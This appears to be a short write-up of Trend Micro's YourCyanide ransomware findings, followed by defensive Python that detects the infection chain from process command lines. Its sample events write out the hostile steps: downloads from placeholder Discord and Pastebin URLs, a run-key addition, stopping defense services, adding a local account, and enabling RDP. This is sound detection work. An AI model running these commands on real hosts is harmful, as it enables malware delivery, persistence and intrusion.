YourCyanide Ransomware Analysis Findings
Trend Micro shared its investigation findings after analyzing several CMD-based ransomware variants related to YourCyanide. The analysis found the ransomware using Pastebin, Discord and Microsoft document links to download the payloads it needs, and development of YourCyanide appears to still be in progress. Trend Micro describes the infection flow as follows: the malware typically arrives on a host as a malicious LNK file, which triggers a PowerShell command that downloads the YourCyanide.exe executable from Discord. That executable launches a CMD file, which downloads a script from Pastebin and creates a registry run key. The CMD file also stops various anti-virus and defense services and creates an account for persistence. For lateral movement, the malware enables RDP with netsh and creates VBS files to spread itself via email.
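As an added defender-side example (not Trend Micro's code or detection content), the following Python maps each stage of the chain summarized above to a pattern over process-creation command lines and raises an alert when several distinct stages appear on one host. The stage names, regexes and sample events are constructed for illustration, and the URLs carry placeholders rather than real payload locations.

```python
import re
from typing import List, Optional, Set

# One pattern per stage of the chain described above (hypothetical names and
# regexes, not a vendor rule set); each is matched case-insensitively.
STAGE_PATTERNS = [
    ("powershell_discord_download", r"\bpowershell(\.exe)?\b.*\bdiscord(app)?\.com\b"),
    ("cmd_pastebin_download", r"\bcmd(\.exe)?\b.*\bpastebin\.com\b"),
    ("run_key_persistence", r"\breg(\.exe)?\s+add\b.*\\CurrentVersion\\Run\b"),
    ("defense_service_stop", r"\b(net|sc)(\.exe)?\s+stop\b"),
    ("local_account_creation", r"\bnet(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("rdp_enable_via_netsh", r"\bnetsh(\.exe)?\b.*remote\s*desktop"),
    ("vbs_mail_spreader", r"\b[wc]script(\.exe)?\b.*\.vbs\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in STAGE_PATTERNS]

# Constructed process-creation events in a key=value layout (PLACEHOLDER stands
# in for any real path segment).
SAMPLE_EVENTS = [
    "ParentImage=explorer.exe Image=powershell.exe CommandLine=powershell -c iwr "
    "https://cdn.discordapp.com/attachments/PLACEHOLDER/YourCyanide.exe -OutFile C:\\Users\\Public\\y.exe",
    "ParentImage=YourCyanide.exe Image=cmd.exe CommandLine=cmd /c curl "
    "https://pastebin.com/raw/PLACEHOLDER -o C:\\Users\\Public\\s.cmd",
    "ParentImage=cmd.exe Image=reg.exe CommandLine=reg add HKCU\\Software\\Microsoft"
    "\\Windows\\CurrentVersion\\Run /v upd /t REG_SZ /d C:\\Users\\Public\\s.cmd /f",
    "ParentImage=cmd.exe Image=net.exe CommandLine=net stop SomeDefenseService",
    "ParentImage=cmd.exe Image=net.exe CommandLine=net user svc_backup Passw0rd! /add",
    "ParentImage=cmd.exe Image=netsh.exe CommandLine=netsh advfirewall firewall "
    "set rule group=\"remote desktop\" new enable=Yes",
    "ParentImage=cmd.exe Image=wscript.exe CommandLine=wscript C:\\Users\\Public\\mail.vbs",
    "ParentImage=explorer.exe Image=notepad.exe CommandLine=notepad C:\\Users\\me\\notes.txt",
]

def extract_command_line(event: str) -> str:
    """Pull the CommandLine field out of a key=value event (whole line if absent)."""
    marker = "CommandLine="
    return event.split(marker, 1)[1] if marker in event else event

def classify(event: str) -> Optional[str]:
    """Return the first chain stage whose pattern matches the event's command line."""
    cmd = extract_command_line(event)
    return next((name for name, pat in COMPILED if pat.search(cmd)), None)

def observed_stages(events: List[str]) -> Set[str]:
    """Distinct chain stages seen across one host's events."""
    return {stage for stage in map(classify, events) if stage}

def chain_alert(events: List[str], min_stages: int = 3) -> bool:
    """Alert when several distinct stages of the chain show up on one host."""
    return len(observed_stages(events)) >= min_stages
```

A single stage such as a `net stop` is noisy on its own; requiring several distinct stages from one host is what makes the alert specific to this chain.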